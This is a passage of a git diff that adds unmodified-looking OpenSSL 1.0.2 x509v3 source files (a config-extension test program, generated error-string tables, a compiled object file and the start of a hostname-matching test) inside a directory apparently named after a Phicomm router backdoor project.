+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/conf.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+/* Test application to add extensions from a config file */
+
+int main(int argc, char **argv)
+{
+    LHASH *conf;
+    X509 *cert;
+    FILE *inf;
+    char *conf_file;
+    int i;
+    int count;
+    X509_EXTENSION *ext;
+    X509V3_add_standard_extensions();
+    ERR_load_crypto_strings();
+    if (!argv[1]) {
+        fprintf(stderr, "Usage: v3conf cert.pem [file.cnf]\n");
+        exit(1);
+    }
+    conf_file = argv[2];
+    if (!conf_file)
+        conf_file = "test.cnf";
+    conf = CONF_load(NULL, "test.cnf", NULL);
+    if (!conf) {
+        fprintf(stderr, "Error opening Config file %s\n", conf_file);
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    inf = fopen(argv[1], "r");
+    if (!inf) {
+        fprintf(stderr, "Can't open certificate file %s\n", argv[1]);
+        exit(1);
+    }
+    cert = PEM_read_X509(inf, NULL, NULL);
+    if (!cert) {
+        fprintf(stderr, "Error reading certificate file %s\n", argv[1]);
+        exit(1);
+    }
+    fclose(inf);
+
+    sk_pop_free(cert->cert_info->extensions, X509_EXTENSION_free);
+    cert->cert_info->extensions = NULL;
+
+    if (!X509V3_EXT_add_conf(conf, NULL, "test_section", cert)) {
+        fprintf(stderr, "Error adding extensions\n");
+        ERR_print_errors_fp(stderr);
+        exit(1);
+    }
+
+    count = X509_get_ext_count(cert);
+    printf("%d extensions\n", count);
+    for (i = 0; i < count; i++) {
+        ext = X509_get_ext(cert, i);
+        printf("%s", OBJ_nid2ln(OBJ_obj2nid(ext->object)));
+        if (ext->critical)
+            printf(",critical:\n");
+        else
+            printf(":\n");
+        X509V3_EXT_print_fp(stdout, ext, 0, 0);
+        printf("\n");
+
+    }
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3err.c
new file mode 100644
index 0000000..bcc1be7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3err.c
@@ -0,0 +1,249 @@
+/* crypto/x509v3/v3err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/x509v3.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_X509V3,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_X509V3,0,reason)
+
+static ERR_STRING_DATA X509V3_str_functs[] = {
+    {ERR_FUNC(X509V3_F_A2I_GENERAL_NAME), "a2i_GENERAL_NAME"},
+    {ERR_FUNC(X509V3_F_ASIDENTIFIERCHOICE_CANONIZE),
+     "ASIDENTIFIERCHOICE_CANONIZE"},
+    {ERR_FUNC(X509V3_F_ASIDENTIFIERCHOICE_IS_CANONICAL),
+     "ASIDENTIFIERCHOICE_IS_CANONICAL"},
+    {ERR_FUNC(X509V3_F_COPY_EMAIL), "COPY_EMAIL"},
+    {ERR_FUNC(X509V3_F_COPY_ISSUER), "COPY_ISSUER"},
+    {ERR_FUNC(X509V3_F_DO_DIRNAME), "DO_DIRNAME"},
+    {ERR_FUNC(X509V3_F_DO_EXT_CONF), "DO_EXT_CONF"},
+    {ERR_FUNC(X509V3_F_DO_EXT_I2D), "DO_EXT_I2D"},
+    {ERR_FUNC(X509V3_F_DO_EXT_NCONF), "DO_EXT_NCONF"},
+    {ERR_FUNC(X509V3_F_DO_I2V_NAME_CONSTRAINTS), "DO_I2V_NAME_CONSTRAINTS"},
+    {ERR_FUNC(X509V3_F_GNAMES_FROM_SECTNAME), "GNAMES_FROM_SECTNAME"},
+    {ERR_FUNC(X509V3_F_HEX_TO_STRING), "hex_to_string"},
+    {ERR_FUNC(X509V3_F_I2S_ASN1_ENUMERATED), "i2s_ASN1_ENUMERATED"},
+    {ERR_FUNC(X509V3_F_I2S_ASN1_IA5STRING), "I2S_ASN1_IA5STRING"},
+    {ERR_FUNC(X509V3_F_I2S_ASN1_INTEGER), "i2s_ASN1_INTEGER"},
+    {ERR_FUNC(X509V3_F_I2V_AUTHORITY_INFO_ACCESS),
+     "I2V_AUTHORITY_INFO_ACCESS"},
+    {ERR_FUNC(X509V3_F_NOTICE_SECTION), "NOTICE_SECTION"},
+    {ERR_FUNC(X509V3_F_NREF_NOS), "NREF_NOS"},
+    {ERR_FUNC(X509V3_F_POLICY_SECTION), "POLICY_SECTION"},
+    {ERR_FUNC(X509V3_F_PROCESS_PCI_VALUE), "PROCESS_PCI_VALUE"},
+    {ERR_FUNC(X509V3_F_R2I_CERTPOL), "R2I_CERTPOL"},
+    {ERR_FUNC(X509V3_F_R2I_PCI), "R2I_PCI"},
+    {ERR_FUNC(X509V3_F_S2I_ASN1_IA5STRING), "S2I_ASN1_IA5STRING"},
+    {ERR_FUNC(X509V3_F_S2I_ASN1_INTEGER), "s2i_ASN1_INTEGER"},
+    {ERR_FUNC(X509V3_F_S2I_ASN1_OCTET_STRING), "s2i_ASN1_OCTET_STRING"},
+    {ERR_FUNC(X509V3_F_S2I_ASN1_SKEY_ID), "S2I_ASN1_SKEY_ID"},
+    {ERR_FUNC(X509V3_F_S2I_SKEY_ID), "S2I_SKEY_ID"},
+    {ERR_FUNC(X509V3_F_SET_DIST_POINT_NAME), "SET_DIST_POINT_NAME"},
+    {ERR_FUNC(X509V3_F_STRING_TO_HEX), "string_to_hex"},
+    {ERR_FUNC(X509V3_F_SXNET_ADD_ID_ASC), "SXNET_add_id_asc"},
+    {ERR_FUNC(X509V3_F_SXNET_ADD_ID_INTEGER), "SXNET_add_id_INTEGER"},
+    {ERR_FUNC(X509V3_F_SXNET_ADD_ID_ULONG), "SXNET_add_id_ulong"},
+    {ERR_FUNC(X509V3_F_SXNET_GET_ID_ASC), "SXNET_get_id_asc"},
+    {ERR_FUNC(X509V3_F_SXNET_GET_ID_ULONG), "SXNET_get_id_ulong"},
+    {ERR_FUNC(X509V3_F_V2I_ASIDENTIFIERS), "V2I_ASIDENTIFIERS"},
+    {ERR_FUNC(X509V3_F_V2I_ASN1_BIT_STRING), "v2i_ASN1_BIT_STRING"},
+    {ERR_FUNC(X509V3_F_V2I_AUTHORITY_INFO_ACCESS),
+     "V2I_AUTHORITY_INFO_ACCESS"},
+    {ERR_FUNC(X509V3_F_V2I_AUTHORITY_KEYID), "V2I_AUTHORITY_KEYID"},
+    {ERR_FUNC(X509V3_F_V2I_BASIC_CONSTRAINTS), "V2I_BASIC_CONSTRAINTS"},
+    {ERR_FUNC(X509V3_F_V2I_CRLD), "V2I_CRLD"},
+    {ERR_FUNC(X509V3_F_V2I_EXTENDED_KEY_USAGE), "V2I_EXTENDED_KEY_USAGE"},
+    {ERR_FUNC(X509V3_F_V2I_GENERAL_NAMES), "v2i_GENERAL_NAMES"},
+    {ERR_FUNC(X509V3_F_V2I_GENERAL_NAME_EX), "v2i_GENERAL_NAME_ex"},
+    {ERR_FUNC(X509V3_F_V2I_IDP), "V2I_IDP"},
+    {ERR_FUNC(X509V3_F_V2I_IPADDRBLOCKS), "V2I_IPADDRBLOCKS"},
+    {ERR_FUNC(X509V3_F_V2I_ISSUER_ALT), "V2I_ISSUER_ALT"},
+    {ERR_FUNC(X509V3_F_V2I_NAME_CONSTRAINTS), "V2I_NAME_CONSTRAINTS"},
+    {ERR_FUNC(X509V3_F_V2I_POLICY_CONSTRAINTS), "V2I_POLICY_CONSTRAINTS"},
+    {ERR_FUNC(X509V3_F_V2I_POLICY_MAPPINGS), "V2I_POLICY_MAPPINGS"},
+    {ERR_FUNC(X509V3_F_V2I_SUBJECT_ALT), "V2I_SUBJECT_ALT"},
+    {ERR_FUNC(X509V3_F_V3_ADDR_VALIDATE_PATH_INTERNAL),
+     "V3_ADDR_VALIDATE_PATH_INTERNAL"},
+    {ERR_FUNC(X509V3_F_V3_GENERIC_EXTENSION), "V3_GENERIC_EXTENSION"},
+    {ERR_FUNC(X509V3_F_X509V3_ADD1_I2D), "X509V3_add1_i2d"},
+    {ERR_FUNC(X509V3_F_X509V3_ADD_VALUE), "X509V3_add_value"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_ADD), "X509V3_EXT_add"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_ADD_ALIAS), "X509V3_EXT_add_alias"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_CONF), "X509V3_EXT_conf"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_FREE), "X509V3_EXT_free"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_I2D), "X509V3_EXT_i2d"},
+    {ERR_FUNC(X509V3_F_X509V3_EXT_NCONF), "X509V3_EXT_nconf"},
+    {ERR_FUNC(X509V3_F_X509V3_GET_SECTION), "X509V3_get_section"},
+    {ERR_FUNC(X509V3_F_X509V3_GET_STRING), "X509V3_get_string"},
+    {ERR_FUNC(X509V3_F_X509V3_GET_VALUE_BOOL), "X509V3_get_value_bool"},
+    {ERR_FUNC(X509V3_F_X509V3_PARSE_LIST), "X509V3_parse_list"},
+    {ERR_FUNC(X509V3_F_X509_PURPOSE_ADD), "X509_PURPOSE_add"},
+    {ERR_FUNC(X509V3_F_X509_PURPOSE_SET), "X509_PURPOSE_set"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA X509V3_str_reasons[] = {
+    {ERR_REASON(X509V3_R_BAD_IP_ADDRESS), "bad ip address"},
+    {ERR_REASON(X509V3_R_BAD_OBJECT), "bad object"},
+    {ERR_REASON(X509V3_R_BN_DEC2BN_ERROR), "bn dec2bn error"},
+    {ERR_REASON(X509V3_R_BN_TO_ASN1_INTEGER_ERROR),
+     "bn to asn1 integer error"},
+    {ERR_REASON(X509V3_R_CANNOT_FIND_FREE_FUNCTION),
+     "cannot find free function"},
+    {ERR_REASON(X509V3_R_DIRNAME_ERROR), "dirname error"},
+    {ERR_REASON(X509V3_R_DISTPOINT_ALREADY_SET), "distpoint already set"},
+    {ERR_REASON(X509V3_R_DUPLICATE_ZONE_ID), "duplicate zone id"},
+    {ERR_REASON(X509V3_R_ERROR_CONVERTING_ZONE), "error converting zone"},
+    {ERR_REASON(X509V3_R_ERROR_CREATING_EXTENSION),
+     "error creating extension"},
+    {ERR_REASON(X509V3_R_ERROR_IN_EXTENSION), "error in extension"},
+    {ERR_REASON(X509V3_R_EXPECTED_A_SECTION_NAME), "expected a section name"},
+    {ERR_REASON(X509V3_R_EXTENSION_EXISTS), "extension exists"},
+    {ERR_REASON(X509V3_R_EXTENSION_NAME_ERROR), "extension name error"},
+    {ERR_REASON(X509V3_R_EXTENSION_NOT_FOUND), "extension not found"},
+    {ERR_REASON(X509V3_R_EXTENSION_SETTING_NOT_SUPPORTED),
+     "extension setting not supported"},
+    {ERR_REASON(X509V3_R_EXTENSION_VALUE_ERROR), "extension value error"},
+    {ERR_REASON(X509V3_R_ILLEGAL_EMPTY_EXTENSION), "illegal empty extension"},
+    {ERR_REASON(X509V3_R_ILLEGAL_HEX_DIGIT), "illegal hex digit"},
+    {ERR_REASON(X509V3_R_INCORRECT_POLICY_SYNTAX_TAG),
+     "incorrect policy syntax tag"},
+    {ERR_REASON(X509V3_R_INVALID_ASNUMBER), "invalid asnumber"},
+    {ERR_REASON(X509V3_R_INVALID_ASRANGE), "invalid asrange"},
+    {ERR_REASON(X509V3_R_INVALID_BOOLEAN_STRING), "invalid boolean string"},
+    {ERR_REASON(X509V3_R_INVALID_EXTENSION_STRING),
+     "invalid extension string"},
+    {ERR_REASON(X509V3_R_INVALID_INHERITANCE), "invalid inheritance"},
+    {ERR_REASON(X509V3_R_INVALID_IPADDRESS), "invalid ipaddress"},
+    {ERR_REASON(X509V3_R_INVALID_MULTIPLE_RDNS), "invalid multiple rdns"},
+    {ERR_REASON(X509V3_R_INVALID_NAME), "invalid name"},
+    {ERR_REASON(X509V3_R_INVALID_NULL_ARGUMENT), "invalid null argument"},
+    {ERR_REASON(X509V3_R_INVALID_NULL_NAME), "invalid null name"},
+    {ERR_REASON(X509V3_R_INVALID_NULL_VALUE), "invalid null value"},
+    {ERR_REASON(X509V3_R_INVALID_NUMBER), "invalid number"},
+    {ERR_REASON(X509V3_R_INVALID_NUMBERS), "invalid numbers"},
+    {ERR_REASON(X509V3_R_INVALID_OBJECT_IDENTIFIER),
+     "invalid object identifier"},
+    {ERR_REASON(X509V3_R_INVALID_OPTION), "invalid option"},
+    {ERR_REASON(X509V3_R_INVALID_POLICY_IDENTIFIER),
+     "invalid policy identifier"},
+    {ERR_REASON(X509V3_R_INVALID_PROXY_POLICY_SETTING),
+     "invalid proxy policy setting"},
+    {ERR_REASON(X509V3_R_INVALID_PURPOSE), "invalid purpose"},
+    {ERR_REASON(X509V3_R_INVALID_SAFI), "invalid safi"},
+    {ERR_REASON(X509V3_R_INVALID_SECTION), "invalid section"},
+    {ERR_REASON(X509V3_R_INVALID_SYNTAX), "invalid syntax"},
+    {ERR_REASON(X509V3_R_ISSUER_DECODE_ERROR), "issuer decode error"},
+    {ERR_REASON(X509V3_R_MISSING_VALUE), "missing value"},
+    {ERR_REASON(X509V3_R_NEED_ORGANIZATION_AND_NUMBERS),
+     "need organization and numbers"},
+    {ERR_REASON(X509V3_R_NO_CONFIG_DATABASE), "no config database"},
+    {ERR_REASON(X509V3_R_NO_ISSUER_CERTIFICATE), "no issuer certificate"},
+    {ERR_REASON(X509V3_R_NO_ISSUER_DETAILS), "no issuer details"},
+    {ERR_REASON(X509V3_R_NO_POLICY_IDENTIFIER), "no policy identifier"},
+    {ERR_REASON(X509V3_R_NO_PROXY_CERT_POLICY_LANGUAGE_DEFINED),
+     "no proxy cert policy language defined"},
+    {ERR_REASON(X509V3_R_NO_PUBLIC_KEY), "no public key"},
+    {ERR_REASON(X509V3_R_NO_SUBJECT_DETAILS), "no subject details"},
+    {ERR_REASON(X509V3_R_ODD_NUMBER_OF_DIGITS), "odd number of digits"},
+    {ERR_REASON(X509V3_R_OPERATION_NOT_DEFINED), "operation not defined"},
+    {ERR_REASON(X509V3_R_OTHERNAME_ERROR), "othername error"},
+    {ERR_REASON(X509V3_R_POLICY_LANGUAGE_ALREADY_DEFINED),
+     "policy language already defined"},
+    {ERR_REASON(X509V3_R_POLICY_PATH_LENGTH), "policy path length"},
+    {ERR_REASON(X509V3_R_POLICY_PATH_LENGTH_ALREADY_DEFINED),
+     "policy path length already defined"},
+    {ERR_REASON(X509V3_R_POLICY_SYNTAX_NOT_CURRENTLY_SUPPORTED),
+     "policy syntax not currently supported"},
+    {ERR_REASON(X509V3_R_POLICY_WHEN_PROXY_LANGUAGE_REQUIRES_NO_POLICY),
+     "policy when proxy language requires no policy"},
+    {ERR_REASON(X509V3_R_SECTION_NOT_FOUND), "section not found"},
+    {ERR_REASON(X509V3_R_UNABLE_TO_GET_ISSUER_DETAILS),
+     "unable to get issuer details"},
+    {ERR_REASON(X509V3_R_UNABLE_TO_GET_ISSUER_KEYID),
+     "unable to get issuer keyid"},
+    {ERR_REASON(X509V3_R_UNKNOWN_BIT_STRING_ARGUMENT),
+     "unknown bit string argument"},
+    {ERR_REASON(X509V3_R_UNKNOWN_EXTENSION), "unknown extension"},
+    {ERR_REASON(X509V3_R_UNKNOWN_EXTENSION_NAME), "unknown extension name"},
+    {ERR_REASON(X509V3_R_UNKNOWN_OPTION), "unknown option"},
+    {ERR_REASON(X509V3_R_UNSUPPORTED_OPTION), "unsupported option"},
+    {ERR_REASON(X509V3_R_UNSUPPORTED_TYPE), "unsupported type"},
+    {ERR_REASON(X509V3_R_USER_TOO_LONG), "user too long"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_X509V3_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(X509V3_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, X509V3_str_functs);
+        ERR_load_strings(0, X509V3_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3err.o
new file mode 100644
index 0000000000000000000000000000000000000000..7c4c12559029c27a4f50e92d32b8980edabd220b
GIT binary patch
literal 1368
zcmbVK%}T>S5S}#tTkr=Df+F>#qAsabL=RGs>P0*hD!oWZ+t`XtT9S>Z2Ym$}#YYf)
z2_Hl8=0#_k-E_M~1P3<r&6oLRXLk3YbaIq243K8P0rVru0#q}7T<pOjWML9Mrj|Zm
z;P~)xKet+`MLv&md#u2$&HQfE3-k9|7PGe3Vj6}}JB@1?*YRluu<SE&CN8qM*nx3Z
z2IFShSjdi!Jz_(|FN%Mp{mW>EA$b2v%QI6aq#l$Z6``4Qr;rHE-V}ozMJ9~=Bzyem
zFFc*Vpp9cVtMr-7d|hyZfYqT?F5B&n)3B>M*4|mc4ta3tH$zz^Cjd<}Fck}LJ?_+i
zp&<4xiMV^ifi)cN0IP)|uzJVyTpu~V!(E2gwHb1!ekJ0jAF*!G>AC^G1s1q%hq*2L
zB5*uccJY6|fKs|c{UnQ`WO5!N*5B+h^2Et^CDNcIf#!An3jQC%^<Vu4YN@7$OEtOw
zx=JFJ`%Ay0aB6B-4HPVOlA?X+wGG@o#!{a{tQyU#+BpVPQ`bL=Bz-PjU&TCn)kTpn
z-K%JHUJ&%osZXhweA?b5d8QBATkK#0J=M_l#OZfOk|(kMG6jkWI$>rIrRm>9Vl&B%
Hfv*1s#rscb

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3nametest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3nametest.c
new file mode 100644
index 0000000..7b5c1c8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3nametest.c
@@ -0,0 +1,336 @@
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include "../e_os.h"
+#include <string.h>
+
+static const char *const names[] = {
+    "a", "b", ".", "*", "@",
+    ".a", "a.", ".b", "b.", ".*", "*.", "*@", "@*", "a@", "@a", "b@", "..",
+    "@@", "**", "*.com", "*com", "*.*.com", "*com", "com*", "*example.com",
+    "*@example.com", "test@*.example.com", "example.com", "www.example.com",
+    "test.www.example.com", "*.example.com", "*.www.example.com",
+    "test.*.example.com", "www.*.com",
+    ".www.example.com", "*www.example.com",
+    "example.net", "xn--rger-koa.example.com",
+    "a.example.com", "b.example.com",
+    "postmaster@example.com", "Postmaster@example.com",
+    "postmaster@EXAMPLE.COM",
+    NULL
+};
+
+static const char *const exceptions[] = {
+    "set CN: host: [*.example.com] matches [a.example.com]",
+    "set CN: host: [*.example.com] matches [b.example.com]",
+    "set CN: host: [*.example.com] matches [www.example.com]",
+    "set CN: host: [*.example.com] matches [xn--rger-koa.example.com]",
+    "set CN: host: [*.www.example.com] matches [test.www.example.com]",
+    "set CN: host: [*.www.example.com] matches [.www.example.com]",
+    "set CN: host: [*www.example.com] matches [www.example.com]",
+    "set CN: host: [test.www.example.com] matches [.www.example.com]",
+    "set CN: host-no-wildcards: [*.www.example.com] matches [.www.example.com]",
+    "set CN: host-no-wildcards: [test.www.example.com] matches [.www.example.com]",
+    "set emailAddress: email: [postmaster@example.com] does not match [Postmaster@example.com]",
+    "set emailAddress: email: [postmaster@EXAMPLE.COM] does not match [Postmaster@example.com]",
+    "set emailAddress: email: [Postmaster@example.com] does not match [postmaster@example.com]",
+    "set emailAddress: email: [Postmaster@example.com] does not match [postmaster@EXAMPLE.COM]",
+    "set dnsName: host: [*.example.com] matches [www.example.com]",
+    "set dnsName: host: [*.example.com] matches [a.example.com]",
+    "set dnsName: host: [*.example.com] matches [b.example.com]",
+    "set dnsName: host: [*.example.com] matches [xn--rger-koa.example.com]",
+    "set dnsName: host: [*.www.example.com] matches [test.www.example.com]",
+    "set dnsName: host-no-wildcards: [*.www.example.com] matches [.www.example.com]",
+    "set dnsName: host-no-wildcards: [test.www.example.com] matches [.www.example.com]",
+    "set dnsName: host: [*.www.example.com] matches [.www.example.com]",
+    "set dnsName: host: [*www.example.com] matches [www.example.com]",
+    "set dnsName: host: [test.www.example.com] matches [.www.example.com]",
+    "set rfc822Name: email: [postmaster@example.com] does not match [Postmaster@example.com]",
+    "set rfc822Name: email: [Postmaster@example.com] does not match [postmaster@example.com]",
+    "set rfc822Name: email: [Postmaster@example.com] does not match [postmaster@EXAMPLE.COM]",
+    "set rfc822Name: email: [postmaster@EXAMPLE.COM] does not match [Postmaster@example.com]",
+    NULL
+};
+
+static int is_exception(const char *msg)
+{
+    const char *const *p;
+    for (p = exceptions; *p; ++p)
+        if (strcmp(msg, *p) == 0)
+            return 1;
+    return 0;
+}
+
+static int set_cn(X509 *crt, ...)
+{
+    int ret = 0;
+    X509_NAME *n = NULL;
+    va_list ap;
+    va_start(ap, crt);
+    n = X509_NAME_new();
+    if (n == NULL)
+        goto out;
+    while (1) {
+        int nid;
+        const char *name;
+        nid = va_arg(ap, int);
+        if (nid == 0)
+            break;
+        name = va_arg(ap, const char *);
+        if (!X509_NAME_add_entry_by_NID(n, nid, MBSTRING_ASC,
+                                        (unsigned char *)name, -1, -1, 1))
+            goto out;
+    }
+    if (!X509_set_subject_name(crt, n))
+        goto out;
+    ret = 1;
+ out:
+    X509_NAME_free(n);
+    va_end(ap);
+    return ret;
+}
+
+/*-
+int             X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc);
+X509_EXTENSION *X509_EXTENSION_create_by_NID(X509_EXTENSION **ex,
+                        int nid, int crit, ASN1_OCTET_STRING *data);
+int             X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc);
+*/
+
+static int set_altname(X509 *crt, ...)
+{
+    int ret = 0;
+    GENERAL_NAMES *gens = NULL;
+    GENERAL_NAME *gen = NULL;
+    ASN1_IA5STRING *ia5 = NULL;
+    va_list ap;
+    va_start(ap, crt);
+    gens = sk_GENERAL_NAME_new_null();
+    if (gens == NULL)
+        goto out;
+    while (1) {
+        int type;
+        const char *name;
+        type = va_arg(ap, int);
+        if (type == 0)
+            break;
+        name = va_arg(ap, const char *);
+
+        gen = GENERAL_NAME_new();
+        if (gen == NULL)
+            goto out;
+        ia5 = ASN1_IA5STRING_new();
+        if (ia5 == NULL)
+            goto out;
+        if (!ASN1_STRING_set(ia5, name, -1))
+            goto out;
+        switch (type) {
+        case GEN_EMAIL:
+        case GEN_DNS:
+            GENERAL_NAME_set0_value(gen, type, ia5);
+            ia5 = NULL;
+            break;
+        default:
+            abort();
+        }
+        sk_GENERAL_NAME_push(gens, gen);
+        gen = NULL;
+    }
+    if (!X509_add1_ext_i2d(crt, NID_subject_alt_name, gens, 0, 0))
+        goto out;
+    ret = 1;
+ out:
+    ASN1_IA5STRING_free(ia5);
+    GENERAL_NAME_free(gen);
+    GENERAL_NAMES_free(gens);
+    va_end(ap);
+    return ret;
+}
+
+static int set_cn1(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_commonName, name, 0);
+}
+
+static int set_cn_and_email(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_commonName, name,
+                  NID_pkcs9_emailAddress, "dummy@example.com", 0);
+}
+
+static int set_cn2(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_commonName, "dummy value",
+                  NID_commonName, name, 0);
+}
+
+static int set_cn3(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_commonName, name,
+                  NID_commonName, "dummy value", 0);
+}
+
+static int set_email1(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_pkcs9_emailAddress, name, 0);
+}
+
+static int set_email2(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_pkcs9_emailAddress, "dummy@example.com",
+                  NID_pkcs9_emailAddress, name, 0);
+}
+
+static int set_email3(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_pkcs9_emailAddress, name,
+                  NID_pkcs9_emailAddress, "dummy@example.com", 0);
+}
+
+static int set_email_and_cn(X509 *crt, const char *name)
+{
+    return set_cn(crt, NID_pkcs9_emailAddress, name,
+                  NID_commonName, "www.example.org", 0);
+}
+
+static int set_altname_dns(X509 *crt, const char *name)
+{
+    return set_altname(crt, GEN_DNS, name, 0);
+}
+
+static int set_altname_email(X509 *crt, const char *name)
+{
+    return set_altname(crt, GEN_EMAIL, name, 0);
+}
+
+struct set_name_fn {
+    int (*fn) (X509 *, const char *);
+    const char *name;
+    int host;
+    int email;
+};
+
+static const struct set_name_fn name_fns[] = {
+    {set_cn1, "set CN", 1, 0},
+    {set_cn2, "set CN", 1, 0},
+    {set_cn3, "set CN", 1, 0},
+    {set_cn_and_email, "set CN", 1, 0},
+    {set_email1, "set emailAddress", 0, 1},
+    {set_email2, "set emailAddress", 0, 1},
+    {set_email3, "set emailAddress", 0, 1},
+    {set_email_and_cn, "set emailAddress", 0, 1},
+    {set_altname_dns, "set dnsName", 1, 0},
+    {set_altname_email, "set rfc822Name", 0, 1},
+    {NULL, NULL, 0}
+};
+
+static X509 *make_cert()
+{
+    X509 *ret = NULL;
+    X509 *crt = NULL;
+    X509_NAME *issuer = NULL;
+    crt = X509_new();
+    if (crt == NULL)
+        goto out;
+    if (!X509_set_version(crt, 3))
+        goto out;
+    ret = crt;
+    crt = NULL;
+ out:
+    X509_NAME_free(issuer);
+    return ret;
+}
+
+static int errors;
+
+static void check_message(const struct set_name_fn *fn, const char *op,
+                          const char *nameincert, int match, const char *name)
+{
+    char msg[1024];
+    if (match < 0)
+        return;
+    BIO_snprintf(msg, sizeof(msg), "%s: %s: [%s] %s [%s]",
+                 fn->name, op, nameincert,
+                 match ? "matches" : "does not match", name);
+    if (is_exception(msg))
+        return;
+    puts(msg);
+    ++errors;
+}
+
+static void run_cert(X509 *crt, const char *nameincert,
+                     const struct set_name_fn *fn)
+{
+    const char *const *pname = names;
+    while (*pname) {
